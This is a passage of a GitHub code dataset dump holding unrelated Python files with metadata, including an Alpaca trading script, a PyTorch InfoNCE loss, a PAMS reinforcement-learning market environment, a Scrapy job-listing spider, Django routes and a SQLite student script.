UBOOT.prompt)\n","repo_name":"EmbLux-Kft/tbot-tbot2go","sub_path":"boards/socrates.py","file_name":"socrates.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11071275322","text":"\"\"\"\nOpening Range Breakout Strategy\nNote:\nThis script is meant to be schedule through the OS.\n\"\"\"\n\nimport sqlite3\nfrom tradingapp import config\nimport smtplib\nimport ssl\nimport alpaca_trade_api as tradeapi\nimport datetime as dt\nfrom tradingapp.timezone import is_dst\n\n# Create a secure SSL context\ncontext = ssl.create_default_context()\n\nconnection = sqlite3.connect(config.DB_FILE)\nconnection.row_factory = sqlite3.Row\n\ncursor = connection.cursor()\n\ncursor.execute(\"\"\"\n SELECT id FROM strategy WHERE name = 'opening_range_breakout'\n\"\"\")\n\nstrategy_id = cursor.fetchone()['id']\n\ncursor.execute(\"\"\"\n SELECT symbol, name\n FROM stock\n JOIN stock_strategy ON stock_strategy.stock_id = stock.id\n WHERE stock_strategy.strategy_id = ?\n\"\"\", (strategy_id,))\n\nstocks = cursor.fetchall()\nsymbols = [stock['symbol'] for stock in 
stocks]\n\ncurrent_date = dt.date.today().isoformat()\n\nif is_dst():\n start_minute_bar = f\"{current_date} 09:30:00-05:00\"\n end_minute_bar = f\"{current_date} 09:45:00-05:00\"\nelse:\n start_minute_bar = f\"{current_date} 09:30:00-04:00\"\n end_minute_bar = f\"{current_date} 09:45:00-04:00\"\n\napi = tradeapi.REST(config.API_KEY, config.SECRET_KEY, base_url=config.API_URL)\n\norders = api.list_orders(status=\"all\", limit=500, after=current_date)\nexisting_order_symbols = [order.symbol for order in orders if order.status != 'canceled']\n\nmessages = []\n\nfor symbol in symbols:\n minute_bars = api.get_barset(symbol, '1Min', start=current_date, end=current_date).df\n\n opening_range_mask = (minute_bars.index >= start_minute_bar) & (minute_bars.index < end_minute_bar)\n opening_range_bars = minute_bars[symbol].loc[opening_range_mask]\n if not opening_range_bars.empty:\n opening_range_low = opening_range_bars['low'].min()\n opening_range_high = opening_range_bars['high'].max()\n opening_range = opening_range_high - opening_range_low\n\n after_opening_range_mask = minute_bars.index >= end_minute_bar\n after_opening_range_bars = minute_bars[symbol].loc[after_opening_range_mask]\n after_opening_range_breakout = after_opening_range_bars[after_opening_range_bars['close'] > opening_range_high]\n\n if not after_opening_range_breakout.empty:\n if symbol not in existing_order_symbols:\n limit_price = after_opening_range_breakout.iloc[0]['close']\n\n messages.append(\n f\"Placing order for {symbol} at {limit_price}, closed above {opening_range_high}\\n\\n{after_opening_range_breakout.iloc[0]}\\n\\n\")\n print(\n f\"Placing order for {symbol} at {limit_price}, closed above {opening_range_high} at {after_opening_range_breakout.iloc[0]}\")\n\n try:\n api.submit_order(\n symbol=symbol,\n side=\"buy\",\n type=\"limit\",\n qty='100',\n time_in_force=\"day\",\n order_class=\"bracket\",\n limit_price=limit_price,\n take_profit=dict(\n limit_price=limit_price + opening_range,\n ),\n stop_loss=dict(\n stop_price=limit_price - opening_range,\n )\n )\n except Exception as e:\n print(f\"Could not submit order {e}\")\n else:\n print(f\"Already an order for {symbol}, skipping\")\n\nwith smtplib.SMTP_SSL(config.EMAIL_HOST, config.EMAIL_PORT, context=context) as server:\n server.login(config.EMAIL_ADDRESS, config.EMAIL_PASSWORD)\n\n email_message = f\"Subject: Trade Notifications for {current_date}\\n\\n\"\n email_message += \"\\n\".join(messages)\n\n server.sendmail(config.EMAIL_ADDRESS, config.EMAIL_ADDRESS, email_message)\n","repo_name":"georgeerol/AlgoTrading","sub_path":"src/tradingapp/opening_range_breakout.py","file_name":"opening_range_breakout.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71755393210","text":"\nlimit = 10**7\n\nset1 = set()\nset2 = set()\nset3 = set()\nset7 = set()\n\na = 1\nwhile a*a < limit:\n a2 = a*a\n b = 1\n while a2+b*b < limit:\n set1.add(a2+b*b)\n b += 1\n b = 1\n while a2+2*b*b < limit:\n set2.add(a2+2*b*b)\n b += 1\n b = 1\n while a2+3*b*b < limit:\n set3.add(a2+3*b*b)\n b += 1\n b = 1\n while a2+7*b*b < limit:\n set7.add(a2+7*b*b)\n b += 1\n a += 
1\nprint(':',len(set1),len(set2),len(set3),len(set7))\nprint(len(set1.intersection(set2).intersection(set3).intersection(set7)))\n","repo_name":"tkoz0/problems-project-euler","sub_path":"p229a_unsolved.py","file_name":"p229a_unsolved.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31302195111","text":"\nimport numpy as np\nfrom collections import Counter\nfrom random import randrange\n\n# Utilitaire pour CNN_test: récupère les données de db_test\n\nclass DataSet(object):\n def __init__(self, filename_data, nbdata, L2normalize=False, batchSize=128):\n self.nbdata = nbdata\n # taille des images 56*56 pixels en couleurs RBG\n self.dim = 9408\n self.imgSize = 56\n self.data = None\n self.batchSize = batchSize\n self.curPos = 0\n self.x = None\n\n f = open(filename_data, 'rb')\n self.data = np.empty([nbdata, self.dim], dtype=np.float32)\n for i in range(nbdata):\n self.data[i,:] = np.fromfile(f, dtype=np.uint8, count=self.dim)\n f.close()\n\n def GetTestBase(self):\n return self.data\n","repo_name":"Marc-Velay/MLA-proj","sub_path":"test_data_utils.py","file_name":"test_data_utils.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21002787605","text":"import datetime\nimport traceback\n\nfrom discord.ext import commands\n\nfrom safety import token\n\ninitial_cogs = [\"cogs.admin\", \"cogs.fun\", \"cogs.utilities\", \"cogs.roles\", \"cogs.tags\", \"cogs.stars\",\"cogs.points\"]\n\nbot = commands.Bot(command_prefix='r.')\n\n@bot.event\nasync def on_ready():\n print('Ready!')\n print(bot.user.name)\n print(bot.user.id)\n print('------------')\n bot.uptime = datetime.datetime.utcnow()\n\nfor cog in initial_cogs:\n try:\n bot.load_extension(cog)\n except Exception as exc:\n traceback_text = \"\\n\".join(traceback.format_exception(type(exc), exc, exc.__traceback__, 4))\n print(traceback_text)\n\nbot.run(token)","repo_name":"Jashanlol/Rewrite-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22355462284","text":"import cerberus\nimport requests\nimport random\n\nAUTH_DATA = {\n \"login\": \"admin\",\n \"password\": \"admin\"\n}\n\nschema = {\n \"name\": {\"type\": \"string\", \"required\": True},\n \"surname\": {\"type\": \"string\", \"required\": True},\n \"grade\": {\"type\": \"number\", \"required\": True},\n \"sex\": {\"type\": \"string\", \"required\": True}\n}\n\n\ndef test_update_add_authorized_session(base_url, set_mock):\n # Create session\n session = requests.Session()\n\n # Create user\n data_to_make = {\n \"name\": \"Test\" + str(random.randint(10, 1000)),\n \"surname\": \"TestSurname\",\n \"grade\": 10,\n \"sex\": \"male\"\n }\n\n set_mock(data_to_make)\n\n response = session.post(f\"{base_url}/update/add\", json=data_to_make)\n\n # Authorization\n login_response =session.request(\"login\", f\"{base_url}/auth/login\", json=AUTH_DATA)\n print(login_response)\n\n # Verify addition and response\n try:\n assert response.json().get(\"status\") == \"ok\"\n except AssertionError:\n raise AssertionError(response.json())\n\n data = response.json().get(\"data\")\n v = cerberus.Validator()\n\n assert response.json()[\"data\"][\"name\"] == data_to_make[\"name\"]\n assert v.validate(data, 
schema)\n","repo_name":"konflic/python_qa_mock","sub_path":"mtb_example/test_mtb_example.py","file_name":"test_mtb_example.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70535551928","text":"import numpy as np\n\nimport torch\nimport torch.nn.functional as F\nfrom torch.nn import init\nfrom torch import nn, autograd\n\n\nclass InfoNCE(nn.Module):\n def __init__(self, num_samples, temp=0.05, momentum=0.2):\n super(InfoNCE, self).__init__()\n self.num_samples = num_samples\n\n self.momentum = momentum\n self.temp = temp\n\n self.register_buffer('labels', torch.arange(num_samples).long().cuda())\n # torch.zeros(num_samples).long())\n\n def forward(self, inputs, features, indexes):\n # inputs: B*2048, features: L*2048\n \n inputs = inputs.mm(features.t())\n\n inputs /= self.temp\n B = inputs.size(0)\n\n def masked_softmax(vec, mask, dim=1, epsilon=1e-6):\n exps = torch.exp(vec)\n masked_exps = exps * mask.float().clone()\n masked_sums = masked_exps.sum(dim, keepdim=True) + epsilon\n return (masked_exps/masked_sums)\n\n targets = self.labels[indexes].clone()\n labels = self.labels.clone()\n\n sim = torch.zeros(labels.max()+1, B).float().cuda()\n sim.index_add_(0, labels, inputs.t().contiguous())\n nums = torch.zeros(labels.max()+1, 1).float().cuda()\n nums.index_add_(0, labels, torch.ones(self.num_samples,1).float().cuda())\n mask = (nums>0).float()\n sim /= (mask*nums+(1-mask)).clone().expand_as(sim)\n mask = mask.expand_as(sim)\n masked_sim = masked_softmax(sim.t().contiguous(), mask.t().contiguous())\n return F.nll_loss(torch.log(masked_sim+1e-6), targets)","repo_name":"ZacharyWang-007/FED-Occluded-ReID","sub_path":"loss/infonce.py","file_name":"infonce.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"77"} +{"seq_id":"73018501048","text":"from .nouns_first import (\n fdma_nouns,\n fdmi_nouns,\n fdf_nouns,\n fdn_nouns\n)\n\nfrom .nouns_second import (\n sdma_nouns,\n sdmi_nouns,\n sdf_nouns,\n sdn_nouns\n)\n\n\nfrom .nouns_third import (\n tdma_nouns,\n tdf_nouns,\n tdn_nouns\n)\n\n\nfrom .verbs_first import fdv_verbs\n\n\nALL_NOUNS = (\n fdma_nouns + fdmi_nouns + fdf_nouns + fdn_nouns\n + sdma_nouns + sdmi_nouns + sdf_nouns + sdn_nouns\n + tdma_nouns + tdf_nouns + tdn_nouns\n )\n\n\nALL_VERBS = (fdv_verbs)\n","repo_name":"pete223/czech","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13716061806","text":"from abc import ABC, abstractmethod\nfrom gym import Env\nfrom gym import Space\nimport numpy as np\nfrom pams.agents import Agent\nfrom pams.agents import HighFrequencyAgent\nfrom pams.logs import Log\nfrom pams.logs import CancelLog\nfrom pams.logs import ExecutionLog\nfrom pams.logs import Log\nfrom pams.logs import Logger\nfrom pams.logs import MarketStepBeginLog\nfrom pams.logs import MarketStepEndLog\nfrom pams.logs import OrderLog\nfrom pams.logs import SessionBeginLog\nfrom pams.logs import SessionEndLog\nfrom pams.logs import SimulationBeginLog\nfrom pams.logs import SimulationEndLog\nfrom pams.market import Market\nfrom pams.order import Cancel\nfrom pams.order import Order\nfrom pams.runners import Runner\nfrom pams.session import Session\nfrom pams.simulator import Simulator\nimport random\nfrom random import Random\nimport 
torch\nfrom typing import Optional, TypeVar\n\nObsType = TypeVar(\"ObsType\")\nActionType = TypeVar(\"ActionType\")\nInfoType = TypeVar(\"InfoType\")\n\nclass PamsEnv(Env, ABC):\n \"\"\"PamsEnv class.\n\n Single agent RL environment for an agent in PAMS.\n This class inherits from the gym.Env class.\n \"\"\"\n def __init__(\n self,\n config_dic: dict,\n variable_ranges_dic: Optional[dict],\n simulator_class: type[Simulator],\n target_agent_name: str,\n action_dim: int,\n obs_dim: int,\n logger: Optional[Logger] = None,\n ) -> None:\n \"\"\"initialization.\n\n Args:\n config_dic (dict): runner configuration. (=settings)\n variable_ranges_dic (Optional[dict]): dict to specify the ranges of values for variables in config.\n Ex: {\"Market1\": {\"fundamentalDrift\": [-0.001,0.001], \"fundamentalVolatility\": [0,0.0001]},\n ...}\n The values of variables are sampled by .modify_config method as each episode.\n simulator_class (type[Simulator]): type of simulator.\n target_agent_name (str): target Agent name.\n action_dim (int): dimension of action space.\n obs_dim (int): dimension of observation space.\n logger (Optional[Logger]): logger instance. Defaults to None.\n \"\"\"\n self.config_dic: dict = config_dic\n self.variable_ranges_dic: Optional[dict] = variable_ranges_dic\n self.simulator_class: type[Simulator] = simulator_class\n self.target_agent_name: str = target_agent_name\n self.action_dim: int = action_dim\n self.obs_dim: int = obs_dim\n self.logger: Optional[Logger] = logger\n self._prng: Random = random.Random()\n self.action_space: Space = self.set_action_space()\n self.obs_space: Space = self.set_obs_space()\n\n @abstractmethod\n def set_action_space(self) -> Space:\n pass\n\n @abstractmethod\n def set_obs_space(self) -> Space:\n pass\n\n def seed(self, seed: int) -> None:\n \"\"\"set seed.\n\n Args:\n seed (int): seed value.\n \"\"\"\n self._prng.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.use_deterministic_algorithms = True\n\n def reset(self) -> ObsType:\n \"\"\"reset environment.\n\n initialize and set up runner and send initial observation to target agent.\n\n This method\n 1. modify config file according to randomlly generate variables by refering to variable_ranges_dic.\n 2. initialize and setup runner.\n 3. add optional attributes to the environment.\n 4. 
iterate markets untill target agent is called for submitting orders.\n\n - self.current_session_time is current number of time steps within the session.\n\n Returns:\n obs (ObsType): initial observation.\n \"\"\"\n initial_config_dic: dict = self.config_dic.copy()\n episode_config_dic: dict = self.modify_config(\n initial_config_dic, self.variable_ranges_dic\n )\n self.runner: Runner = self.setup_runner(episode_config_dic, self.logger)\n self.simulator: Simulator = self.runner.simulator\n self.target_agent: Agent = self.simulator.name2agent[self.target_agent_name]\n self.is_hft: bool = isinstance(self.target_agent, HighFrequencyAgent)\n self.sessions: list[Session] = self.simulator.sessions\n self.markets: list[Market] = self.simulator.markets\n self.current_session_idx: int = 0\n self.current_session_time: int = 0\n if self.logger is not None:\n log: Log = SimulationBeginLog(simulator=self.simulator)\n log.read_and_write_with_direct_process(logger=self.logger)\n self.add_attributes()\n self.unplaced_local_orders, _ = self.iterate_markets_til_target_agent_is_called()\n obs: ObsType = self.generate_obs()\n return obs\n\n def step(\n self,\n action: ActionType\n ) -> tuple[ObsType, float, bool, InfoType]:\n \"\"\"step environment.\n\n receive action by the agent and step the environment.\n\n Args:\n action (ActionType): action by target agent.\n\n Returns:\n next_obs (ObsType):\n reward (float):\n done (bool):\n info (InfoType):\n \"\"\"\n target_orders: list[Order | Cancel] = self.convert_action2orders(action)\n if self.is_hft:\n self.handle_orders_by_single_agent(target_orders)\n self.unplaced_local_orders, is_target_agent_called = \\\n self.handle_orders_wo_target_agents(\n session=self.current_session,\n unplaced_local_orders=self.unplaced_local_orders\n )\n if is_target_agent_called:\n next_obs: ObsType = self.generate_obs()\n reward: float = self.generate_reward()\n done: bool = False\n info: InfoType = self.generate_info()\n return next_obs, reward, done, info\n else:\n self.unplaced_local_orders.append(target_orders)\n self.runner._handle_orders(\n session=self.current_session, local_orders=self.unplaced_local_orders\n )\n for market in self.markets:\n if self.logger is not None:\n log = MarketStepEndLog(\n session=self.current_session, market=market, simulator=self.simulator\n )\n log.read_and_write_with_direct_process(logger=self.logger)\n self.simulator._trigger_event_after_step_for_market(market=market)\n self.unplaced_local_orders, done = self.iterate_markets_til_target_agent_is_called()\n next_obs: ObsType = self.generate_obs()\n reward: float = self.generate_reward()\n info: InfoType = self.generate_info()\n return next_obs, reward, done, info\n\n def iterate_markets_til_target_agent_is_called(\n self\n ) -> tuple[Optional[list[list[Order | Cancel]]], bool]:\n \"\"\"iterate markets until target agent is called for submitting orders.\n\n Returns:\n unplaced_local_orders (Optional[list[list[Order | Cancel]]]):\n local orders that have not yet placed at markets.\n done (bool): whether the simulation ended or not.\n \"\"\"\n done: bool = False\n while True:\n self.simulator._update_times_on_markets(self.markets)\n self.market_time: int = self.markets[0].get_time()\n self.simulator.current_session = self.sessions[self.current_session_idx]\n self.current_session: Session = self.simulator.current_session\n if self.current_session_time == 0:\n self.simulator._trigger_event_before_session(session=self.current_session)\n if self.logger is not None:\n log: Log = SessionBeginLog(\n 
session=self.current_session, simulator=self.simulator\n )\n log.read_and_write_with_direct_process(logger=self.logger)\n self.current_session_time += 1\n elif self.current_session_time == self.current_session.iteration_steps:\n self.simulator._trigger_event_after_session(session=self.current_session)\n if self.logger is not None:\n log = SessionEndLog(\n session=self.current_session, simulator=self.simulator\n )\n log.read_and_write_with_direct_process(logger=self.logger)\n if self.current_session_idx + 1 == len(self.sessions):\n done: bool = True\n if self.logger is not None:\n log = SimulationEndLog(simulator=self.simulator)\n log.read_and_write_with_direct_process(logger=self.logger)\n return None, done\n self.current_session_idx += 1\n self.current_session_time = 0\n else:\n self.current_session_time += 1\n for market in self.markets:\n market._is_running = self.current_session.with_order_execution\n self.simulator._trigger_event_before_step_for_market(market=market)\n if self.logger is not None:\n log = MarketStepBeginLog(\n session=self.current_session, market=market, simulator=self.simulator\n )\n log.read_and_write_with_direct_process(logger=self.logger)\n if self.current_session.with_order_placement:\n if self.is_hft:\n unplaced_local_orders: list[list[Order | Cancel]] = \\\n self.runner._collect_orders_from_normal_agents(\n session=self.current_session\n )\n unplaced_local_orders, is_target_agent_called = \\\n self.handle_orders_wo_target_agents(\n session=self.current_session,\n unplaced_local_orders=unplaced_local_orders\n )\n if is_target_agent_called:\n return unplaced_local_orders, done\n else:\n unplaced_local_orders, is_target_agent_called = \\\n self.collect_orders_from_normal_agents_wo_target_agent(\n session=self.current_session\n )\n if is_target_agent_called:\n return unplaced_local_orders, done\n self.runner._handle_orders(\n session=self.current_session, local_orders=unplaced_local_orders\n )\n for market in self.markets:\n if self.logger is not None:\n log = MarketStepEndLog(\n session=self.current_session, market=market, simulator=self.simulator\n )\n log.read_and_write_with_direct_process(logger=self.logger)\n self.simulator._trigger_event_after_step_for_market(market=market)\n\n def collect_orders_from_normal_agents_wo_target_agent(\n self,\n session: Session\n ) -> tuple[list[list[Order | Cancel]], bool]:\n \"\"\"_summary_\n\n Args:\n session (Session): _description_\n\n Returns:\n unplaced_local_orders (list[list[Order | Cancel]]): _description_\n is_target_agent_called (bool): _description_\n \"\"\"\n agents: list[Agent] = self.simulator.normal_frequency_agents\n agents = self._prng.sample(agents, len(agents))\n unplaced_local_orders: list[list[Order | Cancel]] = []\n n_orders: int = 0\n is_target_agent_called: bool = False\n for agent in agents:\n if session.max_normal_orders <= n_orders:\n break\n if agent.name == self.target_agent_name:\n n_orders += 1\n is_target_agent_called = True\n continue\n orders: list[Order | Cancel] = agent.submit_orders(markets=self.simulator.markets)\n if len(orders) > 0:\n unplaced_local_orders.append(orders)\n n_orders += 1\n return unplaced_local_orders, is_target_agent_called\n\n def handle_orders_wo_target_agents(\n self,\n session: Session,\n unplaced_local_orders: list[list[Order | Cancel]]\n ) -> tuple[list[list[Order | Cancel]], bool]:\n \"\"\"_summary_\n\n Args:\n session (Session): _description_\n unplaced_local_orders (list[list[Order | Cancel]]): _description_\n\n Returns:\n unplaced_local_orders (list[list[Order | 
Cancel]]): _description_\n            is_target_agent_called (bool): _description_\n        \"\"\"\n        removing_orders: list[list[Order | Cancel]] = []\n        is_target_agent_called: bool = False\n        for orders in unplaced_local_orders:\n            self.handle_orders_by_single_agent(\n                session, orders\n            )\n            removing_orders.append(orders)\n            if session.high_frequency_submission_rate < self._prng.random():\n                continue\n            n_high_freq_orders: int = 0\n            agents = self.simulator.high_frequency_agents\n            agents = self._prng.sample(agents, len(agents))\n            for agent in agents:\n                if n_high_freq_orders >= session.max_high_frequency_orders:\n                    break\n                if agent.name == self.target_agent_name:\n                    is_target_agent_called = True\n                    break\n                high_freq_orders: list[Order | Cancel] = agent.submit_orders(markets=self.simulator.markets)\n                n_high_freq_orders += 1\n                self.handle_orders_by_single_agent(\n                    session, high_freq_orders\n                )\n            if is_target_agent_called:\n                break\n        for orders in removing_orders:\n            unplaced_local_orders.remove(orders)\n        return unplaced_local_orders, is_target_agent_called\n\n    def handle_orders_by_single_agent(\n        self,\n        session: Session,\n        orders: list[Order | Cancel]\n    ) -> None:\n        for order in orders:\n            market: Market = self.simulator.id2market[order.market_id]\n            if isinstance(order, Order):\n                self.simulator._trigger_event_before_order(order=order)\n                log: OrderLog = market._add_order(order=order)\n                agent: Agent = self.simulator.id2agent[order.agent_id]\n                agent.submitted_order(log=log)\n                self.simulator._trigger_event_after_order(order_log=log)\n            elif isinstance(order, Cancel):\n                self.simulator._trigger_event_before_cancel(cancel=order)\n                log_: CancelLog = market._cancel_order(cancel=order)\n                agent = self.simulator.id2agent[order.order.agent_id]\n                agent.canceled_order(log=log_)\n                self.simulator._trigger_event_after_cancel(cancel_log=log_)\n            if session.with_order_execution:\n                logs: list[ExecutionLog] = market._execution()\n                self.simulator._update_agents_for_execution(execution_logs=logs)\n                for execution_log in logs:\n                    agent = self.simulator.id2agent[execution_log.buy_agent_id]\n                    agent.executed_order(log=execution_log)\n                    agent = self.simulator.id2agent[execution_log.sell_agent_id]\n                    agent.executed_order(log=execution_log)\n                    self.simulator._trigger_event_after_execution(\n                        execution_log=execution_log\n                    )\n\n    @abstractmethod\n    def modify_config(\n        self,\n        initial_config_dic: dict,\n        variable_ranges_dic: dict\n    ) -> dict:\n        pass\n\n    @abstractmethod\n    def setup_runner(\n        self,\n        episode_config_dic: dict,\n        logger: Optional[Logger] = None\n    ) -> Runner:\n        pass\n\n    def add_attributes(self) -> None:\n        pass\n\n    @abstractmethod\n    def generate_obs(self) -> ObsType:\n        pass\n\n    @abstractmethod\n    def generate_reward(self) -> float:\n        pass\n\n    @abstractmethod\n    def generate_info(self) -> float:\n        pass\n\n    @abstractmethod\n    def convert_action2orders(self, action: ActionType) -> list[Order | Cancel]:\n        pass\n","repo_name":"ryuji-hashimoto0110/pams_environments","sub_path":"envs/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":16587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29375754349","text":"def alinearSecuencias(string1,string2):\n    string2=list(string2)\n    STRING=\"\"\n    x=0\n    for i in string1:\n        if string2[x] == i:\n            STRING+=string2[x]\n            string2[x]=\"*\"\n            x+=1\n        else:\n            STRING+=\"_\"\n    for i in string2:\n        if i != \"*\":\n            STRING+=i\n    return STRING\n\n#INPUT 
\ns1=\"ACCTGGTTCTGTAGTCAGGATTACTA\"\ns2=\"TGACGTTCAGTAGTCGATT\"\n#SALIDA\nalineado=alinearSecuencias(s1,s2)\nprint(alineado)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito2_ej1/hito2_ej1_733d1e8c7375ce82970b28e90b39825d.py","file_name":"hito2_ej1_733d1e8c7375ce82970b28e90b39825d.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72113690168","text":"# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass JySpider(scrapy.Spider):\n name = 'jy'\n allowed_domains = ['guet.edu.cn']\n start_urls = ['https://www.guet.edu.cn/jy/zhaopin.jsp?a165823t=475&a165823p=1&a165823c=10&urltype=tree.TreeTempUrl&wbtreeid=1003']\n date = '' #此date为给定日期,已在__init__.py中初始化,直接在下面函数中用self.date调用即可\n\n def parse(self, response):\n # 爬取1到200页\n for i in range(1, 100):\n url = 'https://www.guet.edu.cn/jy/zhaopin.jsp?a165823t=475&a165823c=10&urltype=tree.TreeTempUrl&wbtreeid=1003&a165823p='+str(i)\n yield scrapy.Request(url, callback=self.parse_page)\n\n def parse_page(self, response):\n # 在此处添加代码\n ret_time = response.xpath(\"//div[@class='recruit-list-left']//a/text()\").extract()\n ret = response.xpath(\"//div[@class='recruit-list-left']//span/text()\").extract()\n for i in range(0, len(ret_time)):\n # 只打印选定日期的企业招聘信息\n if ret[i].strip() == self.date:\n print(ret_time[i])\n","repo_name":"jesee030/pythonProject","sub_path":"网络爬虫/src/guet/guet/spiders/jy.py","file_name":"jy.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32564550168","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.home, name='start'),\n path('home', views.invent),\n path('session', views.session),\n path('index.html', views.index),\n path('logout', views.logout),\n path('reservation', views.reservation, name='reservation'),\n path('utilisateur/', views.utilisateur),\n path('coworker.html/', views.coworker),\n path('dashboard.html/', views.dashboard),\n path('accueil.html/', views.accueil, name='home'),\n path('animateur.html/', views.animateur),\n path('sites.html/', views.salle),\n path('espace', views.espace, name='space'),\n path('type', views.type, name='type'),\n path('site', views.site, name='site'),\n path('service', views.service, name='service'),\n path('formule', views.formule, name='formule'),\n path('values', views.values),\n path('plan', views.plan),\n path('stats///', views.stats),\n path('link', views.link)\n]\nhandler404 = 'blueworks.views.handler404'\n","repo_name":"kimia-technologies/blueworksWeb","sub_path":"blueworks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38085075834","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Author: v.stone@163.com\n\"\"\"\ncommon\n+-- elePages\n +-- __init__.py\n +-- menu_name.py\n\n__init__.py\nfrom . import menu_name\n\nmenu_name.py\ndef Page_Name():\n return {\n 'menu': '',\n 'page': '',\n }\n\"\"\"\n\nimport os\n\n\ndef generate_menu_cls():\n print('Extract elements dir to generate menu class ... 
', end='\\t')\n ele_menu_list = list()\n ele_menu_dir = os.path.join(os.getenv('RF_PWD'), 'pages')\n for _dir in os.listdir(ele_menu_dir):\n if os.path.isdir(os.path.join(ele_menu_dir, _dir)):\n ele_menu_list.append(_dir)\n print('DONE')\n # print(ele_menu_list)\n ele_pages_dir = os.path.join(os.getenv('RF_PWD'), 'common', 'elePages')\n ele_pages_init = os.path.join(os.getenv('RF_PWD'), 'common', 'elePages', '__init__.py')\n # print(ele_pages_init)\n if not os.path.exists(ele_pages_dir):\n os.mkdir(ele_pages_dir)\n ele_cls = [\n '#!/usr/bin/env python3',\n '# -*- coding: utf-8- -*-',\n '# Author: elementGenerator.py',\n '\\n'\n ]\n for ele_menu in ele_menu_list:\n ele_cls.append('from . import %s' % ele_menu)\n with open(ele_pages_init, 'w') as f:\n f.write('\\n'.join(ele_cls))\n # with open(ele_pages_init, 'r') as f:\n # print(f.read())\n return ele_menu_list\n\n\ndef generate_page_py(ele_menu: str):\n print('Extract menu %s dir to generate page py ... ' % ele_menu, end='\\t')\n ele_page_py = os.path.join(\n os.getenv('RF_PWD'),\n 'common',\n 'elePages',\n '%s.py' % ele_menu\n )\n ele_def = [\n '#!/usr/bin/env python3',\n '# -*- coding: utf-8- -*-',\n '# Author: elementGenerator.py',\n '\\n'\n ]\n ele_page_dir = os.path.join(os.getenv('RF_PWD'), 'pages', ele_menu)\n for ele_page in os.listdir(ele_page_dir):\n if not ele_page.startswith('__'):\n ele_def.append('\\n'.join([\n 'def %s():' % ele_page.split('.py')[0],\n '\\treturn {',\n '\\t\\t\"menu\": \"%s\",' % ele_menu,\n '\\t\\t\"page\": \"%s\",' % ele_page.split('.py')[0],\n '\\t}',\n '\\n'\n ]))\n print('DONE')\n with open(ele_page_py, 'w') as f:\n f.write('\\n'.join(ele_def))\n # with open(ele_page_py, 'r') as f:\n # print(f.read())\n return True\n\n\nif __name__ == '__main__':\n for menu_name in generate_menu_cls():\n generate_page_py(menu_name)\n","repo_name":"seoktaehyeon/sraFramework","sub_path":"common/elementGenerator.py","file_name":"elementGenerator.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"72133154488","text":"#!/home/layersony/.local/share/virtualenvs/phase-python-series-2WgKwfZU/bin/python\nimport sqlite3\n\nclass Students:\n # initialize variables\n def __init__(self, student_name, student_reg):\n self.student_name = student_name\n self.student_reg = student_reg\n\n def save(self, db_cursor, connection):\n db_cursor.execute(f'''INSERT INTO students (student_name, student_reg) \n VALUES ('{self.student_name}', '{self.student_reg}')''')\n connection.commit() # persist the changes\n\n print('Successfully added student')\n\n @classmethod\n def get_all_students(cls, db_cursor):\n return db_cursor.execute('SELECT * FROM students')\n\nconnection = sqlite3.connect('library.db')\n\ndb_cursor = connection.cursor() # \n\n### Create new Student\n\nstudent1 = Students('Jane Doe', '20238765')\nstudent1.save(db_cursor, connection)\n\nstudent2 = Students('Jack Jill', '20231234')\nstudent2.save(db_cursor, connection)\n\n# print all students\nall_students = Students.get_all_students(db_cursor)\n\nfor student in all_students:\n print(student)\ndb_cursor.close()\n","repo_name":"layersony/Phase-3-Python-Series","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"2640411820","text":"import sys\n\ninput = sys.stdin.readline\n\nn,m = map(int,input().split())\n\ns = []\nfor _ in range(n):\n 
